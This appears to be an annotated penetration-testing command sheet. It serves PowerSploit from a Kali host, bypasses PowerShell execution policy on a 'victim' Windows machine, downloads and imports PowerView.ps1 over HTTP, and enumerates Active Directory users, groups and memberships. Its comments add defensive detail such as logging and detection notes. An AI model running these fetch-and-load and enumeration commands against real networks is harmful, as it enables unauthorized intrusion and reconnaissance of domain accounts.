# Run on the Kali host:
# Serves the PowerSploit Recon directory over plain HTTP on port 80.
# http.server listens on every interface unless --bind is given, has no
# authentication or TLS, and shows a directory listing to any host that can
# reach it. Port 80 is a privileged port, so this normally needs root.
# The -d/--directory option requires Python 3.7 or later.
python3 -m http.server 80 -d /usr/share/windows-resources/powersploit/Recon
# Run on the victim Windows machine, in PowerShell:
# Starts a child PowerShell whose execution policy is Bypass for that process
# only. Execution policy is a safety setting, not a security boundary: AMSI,
# script block logging and Constrained Language Mode are not changed by it.
powershell -ep bypass
# Downloads PowerView.ps1 into the current directory (iwr = Invoke-WebRequest).
# $IP_KALI stands for the Kali host's address; PowerShell expands it as a
# variable, so it has to be set beforehand or replaced by hand.
# The transfer is cleartext HTTP with no integrity check, and the file is
# written to disk, where on-access antivirus scanning applies.
iwr -uri http://$IP_KALI/PowerView.ps1 -Outfile PowerView.ps1
# With script block logging enabled, the imported script's content is recorded
# as event ID 4104 in the Microsoft-Windows-PowerShell/Operational log.
Import-Module .\PowerView.ps1 # Load the PowerView functions into the current session.
# The commands below are read-only directory queries. By default any
# authenticated domain user may perform them, so they need no elevated rights.
# NOTE(review): the listing mixes Get-Net* and Get-Domain* names; this assumes
# a PowerView version that exposes both - confirm against the copy in use.

# Get domain information for the current domain:
Get-NetDomain
# Get a list of all users (every attribute returned for each account):
Get-NetUser
# Get selected user attributes.
# lastlogon is not replicated between domain controllers, so the value shown
# reflects only the DC that answered the query.
Get-NetUser | select cn, pwdlastset, lastlogon
# Get a list of all groups (common name only):
Get-NetGroup | select cn
# Enumerate a specific group (e.g., Sales Department).
# The member attribute holds the distinguished names of direct members only.
Get-NetGroup "Sales Department" | select member
# List of users with their group memberships (memberof) and identifying attributes.
# description is free text readable by every authenticated user, which is why
# it should never be used to store credentials or other secrets.
Get-NetUser | select cn, pwdlastset, lastlogon, samaccountname, userprincipalname, description, memberof | Format-Table -Wrap -AutoSize
# List of groups with the members in each.
# Runs one Get-DomainGroupMember lookup per group, so a large domain produces a
# burst of LDAP searches from this host. A group with no members still prints
# its "Group:" line.
# NOTE(review): passes cn as the group identity - presumably PowerView resolves
# it; verify for groups whose cn differs from samaccountname.
Get-NetGroup | ForEach-Object { Write-Output "Group: $($_.cn)"; Get-DomainGroupMember $_.cn | ForEach-Object { " - Member: $($_.membername)" } }
# List of groups with the members in each; a group with no members is not listed.
# The lookup result is stored in $members first, and the group header is only
# written when that result is non-empty. Same one-lookup-per-group query
# pattern as the command above.
Get-NetGroup | ForEach-Object { $members = Get-DomainGroupMember $_.cn; if ($members) { Write-Output "Group: $($_.cn)"; $members | ForEach-Object { " - Member: $($_.membername)" } } }